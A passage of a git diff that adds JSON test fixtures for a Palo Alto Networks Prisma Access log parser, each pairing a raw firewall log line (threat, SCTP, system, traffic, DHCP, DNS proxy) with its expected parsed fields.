\"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"TimeGeneratedHighResolution\": \"2024-06-25T21:30:00.778000Z\", \"NSSAINetworkSliceType\": null}"
+  },
+  "expected": {
+    "message": "{\"TimeReceived\": \"2024-06-25T21:30:08.000000Z\", \"DeviceSN\": \"no-serial\", \"LogType\": \"THREAT\", \"Subtype\": \"url\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-06-25T21:30:00.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"4.3.2.1\", \"NATDestination\": \"8.7.6.5\", \"Rule\": \"Global_Internet_Network_Awareness_Service\", \"SourceUser\": \"jdoe@example.org\", \"DestinationUser\": null, \"Application\": \"web-browsing\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"ZR-EUWS-1\", \"ToZone\": \"untrust\", \"InboundInterface\": \"tunnel.107\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"default\", \"SessionID\": 1787364, \"RepeatCount\": 1, \"SourcePort\": 53610, \"DestinationPort\": 80, \"NATSourcePort\": 36160, \"NATDestinationPort\": 80, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"URL\": \"www.example.com/connecttest.txt\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Informational\", \"DirectionOfAttack\": \"client to server\", \"SequenceNo\": 7372845116442397960, \"SourceLocation\": \"10.0.0.0-10.255.255.255\", \"DestinationLocation\": \"US\", \"ContentType\": \"text/plain\", \"PacketID\": 0, \"URLCounter\": 1, \"UserAgent\": \"Microsoft NCSI\", \"X-Forwarded-For\": null, \"Referer\": null, \"DGHierarchyLevel1\": 463, \"DGHierarchyLevel2\": 525, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"ZR-EUWS-1\", \"SourceUUID\": null, \"DestinationUUID\": null, \"HTTPMethod\": \"get\", \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"InlineMLVerdict\": \"unknown\", \"ContentVersion\": \"0\", \"SigFlags\": 0, \"HTTPHeaders\": null, \"URLCategoryList\": \".msftconnecttest.com,computer-and-internet-info,low-risk\", \"RuleUUID\": \"481a523a-44c0-4c37-b2d5-b6b541d775c3\", \"HTTP2Connection\": 0, \"DynamicUserGroupName\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"TimeGeneratedHighResolution\": \"2024-06-25T21:30:00.778000Z\", \"NSSAINetworkSliceType\": null}",
+    "event": {
+      "action": "alert",
+      "category": [
+        "network"
+      ],
+      "dataset": "threat",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-06-25T21:30:00Z",
+    "action": {
+      "name": "alert",
+      "outcome": "success",
+      "type": "url"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "domain": "www.example.com",
+      "geo": {
+        "country_iso_code": "US"
+      },
+      "ip": "5.6.7.8",
+      "nat": {
+        "ip": "8.7.6.5",
+        "port": 80
+      },
+      "port": 80
+    },
+    "http": {
+      "request": {
+        "method": "get"
+      }
+    },
+    "log": {
+      "hostname": "ZR-EUWS-1",
+      "level": "Informational",
+      "logger": "threat"
+    },
+    "network": {
+      "application": "web-browsing"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "untrust"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "ZR-EUWS-1"
+        }
+      },
+      "name": "ZR-EUWS-1",
+      "product": "PAN-OS",
+      "serial_number": "no-serial"
+    },
+    "paloalto": {
+      "ContentType": "text/plain",
+      "DGHierarchyLevel1": "463",
+      "DGHierarchyLevel2": "525",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "DirectionOfAttack": "client to server",
+      "Threat_ContentType": "url",
+      "URLCategory": "computer-and-internet-info",
+      "VirtualLocation": "vsys1"
+    },
+    "related": {
+      "hosts": [
+        "www.example.com"
+      ],
+      "ip": [
+        "1.2.3.4",
+        "4.3.2.1",
+        "5.6.7.8",
+        "8.7.6.5"
+      ],
+      "user": [
+        "example.org",
+        "jdoe@example.org"
+      ]
+    },
+    "rule": {
+      "name": "Global_Internet_Network_Awareness_Service",
+      "uuid": "481a523a-44c0-4c37-b2d5-b6b541d775c3"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "4.3.2.1",
+        "port": 36160
+      },
+      "port": 53610,
+      "user": {
+        "name": "jdoe@example.org"
+      }
+    },
+    "threat": {
+      "indicator": {
+        "name": "www.example.com/connecttest.txt"
+      }
+    },
+    "url": {
+      "domain": "www.example.com",
+      "path": "connecttest.txt",
+      "registered_domain": "example.com",
+      "subdomain": "www",
+      "top_level_domain": "com"
+    },
+    "user": {
+      "domain": "jdoe",
+      "email": "jdoe@example.org",
+      "name": "example.org"
+    },
+    "user_agent": {
+      "name": "Microsoft NCSI"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/sctp_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/sctp_cef.json
new file mode 100644
index 000000000..717e963a0
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/sctp_cef.json	
@@ -0,0 +1,91 @@
+{
+  "input": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|SCTP||9|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:22:02 deviceExternalId=xxxxxxxxxxxxx PanOSCaptivePortal= PanOSContentVersion= PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDestinationDeviceClass= PanOSDestinationDeviceMac= PanOSDestinationDeviceModel= PanOSDestinationDeviceOS= PanOSDestinationDeviceVendor= PanOSDestinationLocation=IN PanOSDestinationUUID= PanOSDestinationUserDomain=paloaltonetwork PanOSDestinationUserName=xxxxx PanOSDestinationUserUUID= PanOSInboundInterfaceDetailsPort=1 PanOSInboundInterfaceDetailsSlot=1 PanOSInboundInterfaceDetailsType=ethernet PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer= PanOSIsContainer= PanOSIsDecryptMirror= PanOSIsDecryptedLog= PanOSIsDecryptedPayloadForward= PanOSIsDuplicateLog=false PanOSIsIPV6= PanOSIsInspectrionBeforeSession= PanOSIsMptcpOn= PanOSIsNonStandardDestinationPort= PanOSIsPacketCapture= PanOSIsPhishing= PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy= PanOSIsReconExcluded= PanOSIsServertoClient= PanOSIsSourceXForwarded= PanOSIsSystemReturn= PanOSIsTransaction= PanOSIsTunnelInspected= PanOSIsURLDenied= PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT= PanOSOutboundInterfaceDetailsPort=2 PanOSOutboundInterfaceDetailsSlot=1 PanOSOutboundInterfaceDetailsType=ethernet PanOSOutboundInterfaceDetailsUnit=0 PanOSSessionEndReason= PanOSSessionOwnerMidx= PanOSSessionTracker= PanOSSeverity=Critical PanOSSourceDeviceClass= PanOSSourceDeviceMac= PanOSSourceDeviceModel= PanOSSourceDeviceOS= PanOSSourceDeviceVendor= PanOSSourceLocation=US PanOSSourceUUID= PanOSSourceUserDomain=paloaltonetwork PanOSSourceUserName=xxxxx PanOSSourceUserUUID= PanOSTunnel=N/A PanOSVirtualSystemID=1 PanOSConfigVersion= start=Mar 01 2021 21:22:02 src=1.1.1.1 dst=1.1.1.1 PanOSNATSource=1.1.1.1 PanOSNATDestination=1.1.1.1 cs1=allow-business-apps cs1Label=Rule PanOSSourceUser=paloaltonetwork\\\\xxxxx PanOSDestinationUser=paloaltonetworkxxxxx PanOSApplication=panorama cs3=vsys1 cs3Label=VirtualLocation cs4=corporate cs4Label=FromZone cs5=untrust cs5Label=ToZone PanOSInboundInterface=ethernet1/1 deviceOutboundInterface=ethernet1/2 cs6=test cs6Label=LogSetting PanOSSessionID=391582 cnt=1 spt=3033 dpt=5496 PanOSNATSourcePort=26714 PanOSNATDestinationPort=15054 proto=tcp act=alert PanOSDGHierarchyLevel1=12 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-5220 externalId=xxxxxxxxxxxxx PanOSEndpointAssociationID=2086888838 PanOSPayloadProtocolID=-1 PanOSSctpChunkType=9 PanOSSCTPEventType=Kerberos single sign-on failed PanOSEventCode=3 PanOSVerificationTag1=0x3bae3042 PanOSVerificationTag2=0x1911015e PanOSSctpCauseCode=0 PanOSDiamAppID=-1 PanOSDiameterCommandCode=-1 PanOSDiamAvpCode=0 PanOSStreamID=0 PanOSAssocationEndReason= PanOSMapAppCode=0 PanOSSccpCallingSSN=0 PanOSSccpCallingGt= PanOSSctpFilter= PanOSChunksTotal=0 PanOSChunksSent=0 PanOSChunksReceived=0 PanOSPacketsTotal=0 PanOSPacketsSent=0 PanOSPacketsReceived=0 PanOSRuleUUID= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12"
+  },
+  "expected": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|SCTP||9|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:22:02 deviceExternalId=xxxxxxxxxxxxx PanOSCaptivePortal= PanOSContentVersion= PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDestinationDeviceClass= PanOSDestinationDeviceMac= PanOSDestinationDeviceModel= PanOSDestinationDeviceOS= PanOSDestinationDeviceVendor= PanOSDestinationLocation=IN PanOSDestinationUUID= PanOSDestinationUserDomain=paloaltonetwork PanOSDestinationUserName=xxxxx PanOSDestinationUserUUID= PanOSInboundInterfaceDetailsPort=1 PanOSInboundInterfaceDetailsSlot=1 PanOSInboundInterfaceDetailsType=ethernet PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer= PanOSIsContainer= PanOSIsDecryptMirror= PanOSIsDecryptedLog= PanOSIsDecryptedPayloadForward= PanOSIsDuplicateLog=false PanOSIsIPV6= PanOSIsInspectrionBeforeSession= PanOSIsMptcpOn= PanOSIsNonStandardDestinationPort= PanOSIsPacketCapture= PanOSIsPhishing= PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy= PanOSIsReconExcluded= PanOSIsServertoClient= PanOSIsSourceXForwarded= PanOSIsSystemReturn= PanOSIsTransaction= PanOSIsTunnelInspected= PanOSIsURLDenied= PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT= PanOSOutboundInterfaceDetailsPort=2 PanOSOutboundInterfaceDetailsSlot=1 PanOSOutboundInterfaceDetailsType=ethernet PanOSOutboundInterfaceDetailsUnit=0 PanOSSessionEndReason= PanOSSessionOwnerMidx= PanOSSessionTracker= PanOSSeverity=Critical PanOSSourceDeviceClass= PanOSSourceDeviceMac= PanOSSourceDeviceModel= PanOSSourceDeviceOS= PanOSSourceDeviceVendor= PanOSSourceLocation=US PanOSSourceUUID= PanOSSourceUserDomain=paloaltonetwork PanOSSourceUserName=xxxxx PanOSSourceUserUUID= PanOSTunnel=N/A PanOSVirtualSystemID=1 PanOSConfigVersion= start=Mar 01 2021 21:22:02 src=1.1.1.1 dst=1.1.1.1 PanOSNATSource=1.1.1.1 PanOSNATDestination=1.1.1.1 cs1=allow-business-apps cs1Label=Rule PanOSSourceUser=paloaltonetwork\\\\xxxxx PanOSDestinationUser=paloaltonetworkxxxxx PanOSApplication=panorama cs3=vsys1 cs3Label=VirtualLocation cs4=corporate cs4Label=FromZone cs5=untrust cs5Label=ToZone PanOSInboundInterface=ethernet1/1 deviceOutboundInterface=ethernet1/2 cs6=test cs6Label=LogSetting PanOSSessionID=391582 cnt=1 spt=3033 dpt=5496 PanOSNATSourcePort=26714 PanOSNATDestinationPort=15054 proto=tcp act=alert PanOSDGHierarchyLevel1=12 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-5220 externalId=xxxxxxxxxxxxx PanOSEndpointAssociationID=2086888838 PanOSPayloadProtocolID=-1 PanOSSctpChunkType=9 PanOSSCTPEventType=Kerberos single sign-on failed PanOSEventCode=3 PanOSVerificationTag1=0x3bae3042 PanOSVerificationTag2=0x1911015e PanOSSctpCauseCode=0 PanOSDiamAppID=-1 PanOSDiameterCommandCode=-1 PanOSDiamAvpCode=0 PanOSStreamID=0 PanOSAssocationEndReason= PanOSMapAppCode=0 PanOSSccpCallingSSN=0 PanOSSccpCallingGt= PanOSSctpFilter= PanOSChunksTotal=0 PanOSChunksSent=0 PanOSChunksReceived=0 PanOSPacketsTotal=0 PanOSPacketsSent=0 PanOSPacketsReceived=0 PanOSRuleUUID= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12",
+    "event": {
+      "action": "alert",
+      "category": [
+        "network"
+      ],
+      "dataset": "sctp",
+      "severity": 9,
+      "start": "2021-03-01T21:22:02Z",
+      "timezone": "UTC",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2021-03-01T21:22:02Z",
+    "destination": {
+      "address": "1.1.1.1",
+      "geo": {
+        "country_iso_code": "IN"
+      },
+      "ip": "1.1.1.1",
+      "packets": 0,
+      "port": 5496
+    },
+    "host": {
+      "hostname": "PA-5220",
+      "id": "xxxxxxxxxxxxx",
+      "name": "PA-5220"
+    },
+    "log": {
+      "hostname": "PA-5220",
+      "logger": "sctp"
+    },
+    "network": {
+      "transport": "tcp"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "untrust",
+          "id": "2",
+          "name": "ethernet1/2"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "corporate"
+        }
+      },
+      "product": "PAN-OS",
+      "type": "LF",
+      "vendor": "Palo Alto Networks",
+      "version": "2.0"
+    },
+    "paloalto": {
+      "PanOSSourceLocation": "US",
+      "VirtualLocation": "vsys1"
+    },
+    "related": {
+      "hosts": [
+        "PA-5220"
+      ],
+      "ip": [
+        "1.1.1.1"
+      ],
+      "user": [
+        "xxxxx"
+      ]
+    },
+    "rule": {
+      "name": "allow-business-apps"
+    },
+    "source": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1",
+      "packets": 0,
+      "port": 3033,
+      "user": {
+        "name": "xxxxx"
+      }
+    },
+    "user": {
+      "name": "xxxxx"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/system_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/system_csv.json
new file mode 100644
index 000000000..3e52f494c
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/system_csv.json	
@@ -0,0 +1,56 @@
+{
+  "input": {
+    "message": "1,2020/12/08 13:44:55,11111114444,SYSTEM,auth,0,2020/12/08 13:44:55,,auth-success,GP,0,0,general,informational,\"authenticated for user 'user1'.   auth profile 'GP', vsys 'vsys123', server profile 'LDAP', server address 'srv01.entreprise.local', From: 1.2.3.4.\",5211100,0x8000000000000000,0,0,0,0,,fw1"
+  },
+  "expected": {
+    "message": "1,2020/12/08 13:44:55,11111114444,SYSTEM,auth,0,2020/12/08 13:44:55,,auth-success,GP,0,0,general,informational,\"authenticated for user 'user1'.   auth profile 'GP', vsys 'vsys123', server profile 'LDAP', server address 'srv01.entreprise.local', From: 1.2.3.4.\",5211100,0x8000000000000000,0,0,0,0,,fw1",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "dataset": "system",
+      "reason": "authenticated for user 'user1'.   auth profile 'GP', vsys 'vsys123', server profile 'LDAP', server address 'srv01.entreprise.local', From: 1.2.3.4.",
+      "type": [
+        "start"
+      ]
+    },
+    "@timestamp": "2020-12-08T13:44:55Z",
+    "action": {
+      "name": "auth-success",
+      "type": "auth"
+    },
+    "log": {
+      "hostname": "fw1",
+      "level": "informational",
+      "logger": "system"
+    },
+    "observer": {
+      "name": "fw1",
+      "product": "PAN-OS",
+      "serial_number": "11111114444"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "auth-success",
+      "Threat_ContentType": "auth"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "user1"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "user": {
+      "name": "user1"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/tcp_allow_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/tcp_allow_csv.json
new file mode 100644
index 000000000..eb10d6148
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/tcp_allow_csv.json	
@@ -0,0 +1,77 @@
+{
+  "input": {
+    "message": "<14>Sep 16 10:00:02 PA-1 1,9/16/19 10:00,1801016000,TRAFFIC,start,2049,9/16/19 10:00,1.2.3.4,4.3.2.1,0.0.0.0,0.0.0.0,proxy1,,,web-browsing,vsys1234,v10213,zone1,a.1,b.2,Secure,9/16/19 10:00,60000,1,61000,80,0,0,0x0,tcp,allow,800,700,70,2,9/16/19 10:00,0,any,0,50660381839,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,2,1,n/a,0,0,0,0,,PP,from-policy,,,0,,0,,N/A,0,0,0,0"
+  },
+  "expected": {
+    "message": "<14>Sep 16 10:00:02 PA-1 1,9/16/19 10:00,1801016000,TRAFFIC,start,2049,9/16/19 10:00,1.2.3.4,4.3.2.1,0.0.0.0,0.0.0.0,proxy1,,,web-browsing,vsys1234,v10213,zone1,a.1,b.2,Secure,9/16/19 10:00,60000,1,61000,80,0,0,0x0,tcp,allow,800,700,70,2,9/16/19 10:00,0,any,0,50660381839,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,2,1,n/a,0,0,0,0,,PP,from-policy,,,0,,0,,N/A,0,0,0,0",
+    "event": {
+      "action": "allow",
+      "category": [
+        "network"
+      ],
+      "dataset": "traffic",
+      "duration": 0,
+      "outcome": "success",
+      "type": [
+        "start"
+      ]
+    },
+    "@timestamp": "2019-09-16T10:00:00Z",
+    "action": {
+      "name": "allow",
+      "outcome": "success",
+      "type": "start"
+    },
+    "destination": {
+      "address": "4.3.2.1",
+      "bytes": 70,
+      "ip": "4.3.2.1",
+      "nat": {
+        "ip": "0.0.0.0",
+        "port": 0
+      },
+      "packets": 1,
+      "port": 80
+    },
+    "log": {
+      "hostname": "PP",
+      "logger": "traffic"
+    },
+    "network": {
+      "application": "web-browsing",
+      "bytes": 800,
+      "packets": 2,
+      "transport": "tcp"
+    },
+    "observer": {
+      "name": "PP",
+      "product": "PAN-OS",
+      "serial_number": "1801016000"
+    },
+    "paloalto": {
+      "Threat_ContentType": "start",
+      "VirtualLocation": "vsys1234"
+    },
+    "related": {
+      "ip": [
+        "0.0.0.0",
+        "1.2.3.4",
+        "4.3.2.1"
+      ]
+    },
+    "rule": {
+      "name": "proxy1"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "bytes": 700,
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "0.0.0.0",
+        "port": 0
+      },
+      "packets": 2,
+      "port": 61000
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_cloud_election_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_cloud_election_json.json
new file mode 100644
index 000000000..3af5d5428
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_cloud_election_json.json	
@@ -0,0 +1,55 @@
+{
+  "input": {
+    "message": "{\"LogTime\":\"2023-02-16T15:36:37.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"url-filtering\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:36:23.000000Z\",\"VirtualLocation\":null,\"EventName\":\"cloud-election\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"CLOUD ELECTION: serverlist2.urlcloud.paloaltonetworks.com IP: 35.244.229.101 was elected, measured alive test 143294.\",\"SequenceNo\":7200776623254143113,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:36:23.710000Z\"}\n"
+  },
+  "expected": {
+    "message": "{\"LogTime\":\"2023-02-16T15:36:37.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"url-filtering\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:36:23.000000Z\",\"VirtualLocation\":null,\"EventName\":\"cloud-election\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"CLOUD ELECTION: serverlist2.urlcloud.paloaltonetworks.com IP: 35.244.229.101 was elected, measured alive test 143294.\",\"SequenceNo\":7200776623254143113,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:36:23.710000Z\"}\n",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "system",
+      "reason": "CLOUD ELECTION: serverlist2.urlcloud.paloaltonetworks.com IP: 35.244.229.101 was elected, measured alive test 143294.",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-16T15:36:23Z",
+    "action": {
+      "type": "url-filtering"
+    },
+    "destination": {
+      "address": "serverlist2.urlcloud.paloaltonetworks.com",
+      "domain": "serverlist2.urlcloud.paloaltonetworks.com",
+      "ip": "35.244.229.101",
+      "registered_domain": "paloaltonetworks.com",
+      "subdomain": "serverlist2.urlcloud",
+      "top_level_domain": "com"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "url-filtering"
+    },
+    "related": {
+      "hosts": [
+        "serverlist2.urlcloud.paloaltonetworks.com"
+      ],
+      "ip": [
+        "35.244.229.101"
+      ]
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_dhcp_renew_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_dhcp_renew_json.json
new file mode 100644
index 000000000..5e1cc96a9
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_dhcp_renew_json.json	
@@ -0,0 +1,56 @@
+{
+  "input": {
+    "message": "{\"LogTime\":\"2023-02-16T17:08:26.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"dhcp\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T17:08:17.000000Z\",\"VirtualLocation\":null,\"EventName\":\"if-renew-trigger\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"DHCP RENEW: interface eth0, ip 1.2.3.4 netmask 255.255.255.0 dhcp server: 1.2.3.1\",\"SequenceNo\":7200776623254143234,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T17:08:17.774000Z\"}\n"
+  },
+  "expected": {
+    "message": "{\"LogTime\":\"2023-02-16T17:08:26.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"dhcp\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T17:08:17.000000Z\",\"VirtualLocation\":null,\"EventName\":\"if-renew-trigger\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"DHCP RENEW: interface eth0, ip 1.2.3.4 netmask 255.255.255.0 dhcp server: 1.2.3.1\",\"SequenceNo\":7200776623254143234,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T17:08:17.774000Z\"}\n",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "system",
+      "reason": "DHCP RENEW: interface eth0, ip 1.2.3.4 netmask 255.255.255.0 dhcp server: 1.2.3.1",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-16T17:08:17Z",
+    "action": {
+      "type": "dhcp"
+    },
+    "destination": {
+      "address": "1.2.3.1"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "ingress": {
+        "interface": {
+          "name": "eth0"
+        }
+      },
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "dhcp"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_dns_proxy_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_dns_proxy_json.json
new file mode 100644
index 000000000..f4541dcbf
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_dns_proxy_json.json	
@@ -0,0 +1,39 @@
+{
+  "input": {
+    "message": "{\"LogTime\":\"2023-02-16T15:31:51.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"dnsproxy\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:31:50.000000Z\",\"VirtualLocation\":null,\"EventName\":\"if-inherit\",\"EventComponent\":\"mgmt-obj\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"DNS Proxy object: mgmt-obj inherited following values from dynamic interface: mgmt-if: Primary DNS: 1.2.3.1 Secondary DNS: ::\",\"SequenceNo\":7200776623254142979,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:31:50.584000Z\"}\n"
+  },
+  "expected": {
